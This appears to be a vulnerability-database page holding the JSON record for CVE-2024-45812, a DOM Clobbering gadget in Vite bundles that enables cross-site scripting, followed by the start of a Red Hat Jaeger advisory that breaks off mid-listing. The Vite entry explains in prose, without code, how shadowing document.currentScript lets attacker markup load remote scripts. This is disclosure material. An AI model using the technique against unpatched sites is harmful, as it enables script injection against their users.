Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2024-45812
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*" ], "defaultStatus": "unknown", "product": "vite", "vendor": "vitejs", "versions": [ { "lessThan": "5.4.6", "status": "affected", "version": "5.4.0", "versionType": "custom" }, { "lessThan": "5.3.6", "status": "affected", "version": "5.3.0", "versionType": "custom" }, { "lessThan": "5.2.14", "status": "affected", "version": "5.0.0", "versionType": "custom" }, { "lessThan": "4.5.5", "status": "affected", "version": "4.0.0", "versionType": "custom" }, { "lessThan": "3.2.11", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-45812", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-18T13:57:07.046459Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-18T13:59:14.314Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "vite", "vendor": "vitejs", "versions": [ { "status": "affected", "version": "\u003e= 5.4.0, \u003c 5.4.6" }, { "status": "affected", "version": "\u003e= 5.3.0, \u003c 5.3.6" }, { "status": "affected", "version": "\u003e= 5.0.0, \u003c 5.2.14" }, { "status": "affected", "version": "\u003e= 4.0.0, \u003c 4.5.5" }, { "status": "affected", "version": "\u003c 3.2.11" } ] } ], "descriptions": [ { "lang": "en", "value": "Vite a frontend build tooling framework for javascript. Affected versions of vite were discovered to contain a DOM Clobbering vulnerability when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`. However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser\u0027s named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server. This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes. This issue has been patched in versions 5.4.6, 5.3.6, 5.2.14, 4.5.5, and 3.2.11. Users are advised to upgrade. There are no known workarounds for this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-79", "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-17T20:08:13.372Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3" }, { "name": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986" }, { "name": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad" }, { "name": "https://research.securitum.com/xss-in-amp4email-dom-clobbering", "tags": [ "x_refsource_MISC" ], "url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering" }, { "name": "https://scnps.co/papers/sp23_domclob.pdf", "tags": [ "x_refsource_MISC" ], "url": "https://scnps.co/papers/sp23_domclob.pdf" } ], "source": { "advisory": "GHSA-64vr-g452-qvp3", "discovery": "UNKNOWN" }, "title": "DOM Clobbering gadget found in vite bundled scripts that leads to XSS in Vite" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2024-45812", "datePublished": "2024-09-17T20:08:13.372Z", "dateReserved": "2024-09-09T14:23:07.505Z", "dateUpdated": "2024-09-18T13:59:14.314Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2024-45812\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-09-17T20:15:06.037\",\"lastModified\":\"2024-09-20T12:30:51.220\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Vite a frontend build tooling framework for javascript. Affected versions of vite were discovered to contain a DOM Clobbering vulnerability when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`. However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser\u0027s named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server. This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes. This issue has been patched in versions 5.4.6, 5.3.6, 5.2.14, 4.5.5, and 3.2.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.\"},{\"lang\":\"es\",\"value\":\"Vite es un framework de herramientas de compilaci\u00f3n de interfaz para javascript. Se descubri\u00f3 que las versiones afectadas de vite contienen una vulnerabilidad de DOM Clobbering al compilar scripts en formato de salida `cjs`/`iife`/`umd`. El gadget DOM Clobbering en el m\u00f3dulo puede provocar cross site scripting (XSS) en p\u00e1ginas web donde hay elementos HTML controlados por atacantes sin script (por ejemplo, una etiqueta img con un atributo de nombre no saneado). DOM Clobbering es un tipo de ataque de reutilizaci\u00f3n de c\u00f3digo en el que el atacante primero incorpora un fragmento de marcado HTML aparentemente benigno que no es un script en la p\u00e1gina web (por ejemplo, a trav\u00e9s de una publicaci\u00f3n o comentario) y aprovecha los gadgets (fragmentos de c\u00f3digo js) que se encuentran en el c\u00f3digo javascript existente para transformarlo en c\u00f3digo ejecutable. Hemos identificado una vulnerabilidad de DOM Clobbering en los scripts incluidos en Vite, en particular cuando los scripts importan din\u00e1micamente otros scripts desde la carpeta de activos y el desarrollador establece el formato de salida de compilaci\u00f3n en `cjs`, `iife` o `umd`. En tales casos, Vite reemplaza las rutas relativas que comienzan con `__VITE_ASSET__` utilizando la URL recuperada de `document.currentScript`. Sin embargo, esta implementaci\u00f3n es vulnerable a un ataque DOM Clobbering. La b\u00fasqueda `document.currentScript` puede ser ocultada por un atacante a trav\u00e9s del mecanismo de acceso al elemento del \u00e1rbol DOM nombrado del navegador. Esta manipulaci\u00f3n permite a un atacante reemplazar el elemento de script deseado con un elemento HTML malicioso. Cuando esto sucede, el atributo src del elemento controlado por el atacante se utiliza como la URL para importar scripts, lo que potencialmente conduce a la carga din\u00e1mica de scripts desde un servidor controlado por el atacante. Esta vulnerabilidad puede resultar en ataques de cross site scripting (XSS) en sitios web que incluyen archivos incluidos en Vite (configurados con un formato de salida de `cjs`, `iife` o `umd`) y permiten a los usuarios inyectar ciertas etiquetas HTML sin scripts sin sanear adecuadamente los atributos name o id. Este problema se ha corregido en las versiones 5.4.6, 5.3.6, 5.2.14, 4.5.5 y 3.2.11. Se recomienda a los usuarios que actualicen la versi\u00f3n. No se conocen workarounds para esta vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\",\"baseScore\":6.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://research.securitum.com/xss-in-amp4email-dom-clobbering\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://scnps.co/papers/sp23_domclob.pdf\",\"source\":\"security-advisories@github.com\"}]}}" } }
rhsa-2024_10962
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A new version of Red Hat OpenShift distributed tracing platform (Jaeger) has been released", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift distributed tracing platform based on Jaeger. Jaeger is a project inspired by Dapper and OpenZipkin. It is a distributed tracing system released as open source by Uber Technologies. It is used for monitoring and troubleshooting microservices-based distributed systems.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2024:10962", "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "external", "summary": "https://docs.redhat.com/en/documentation/openshift_container_platform/4.17/html/distributed_tracing/distributed-tracing-platform-jaeger", "url": "https://docs.redhat.com/en/documentation/openshift_container_platform/4.17/html/distributed_tracing/distributed-tracing-platform-jaeger" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10962.json" } ], "title": "Red Hat Security Advisory: Red Hat OpenShift distributed tracing platform (Jaeger) 3.4 release", "tracking": { "current_release_date": "2024-12-20T18:57:01+00:00", "generator": { "date": "2024-12-20T18:57:01+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2024:10962", "initial_release_date": "2024-12-11T16:47:10+00:00", "revision_history": [ { "date": "2024-12-11T16:47:10+00:00", "number": "1", "summary": "Initial version" }, { "date": "2024-12-11T16:47:10+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-20T18:57:01+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift distributed tracing 3.4", "product": { "name": "Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_distributed_tracing:3.4::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift distributed tracing" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3A2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3Aeebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-operator-bundle@sha256%3A44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3Abf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3A43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3Afd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Ac254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3Ada3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3A8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "amd64" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3Aa7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3Ab7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3A6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3Afed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Ae8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3A4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3A78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "arm64" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3A3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3Aceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "product_id": 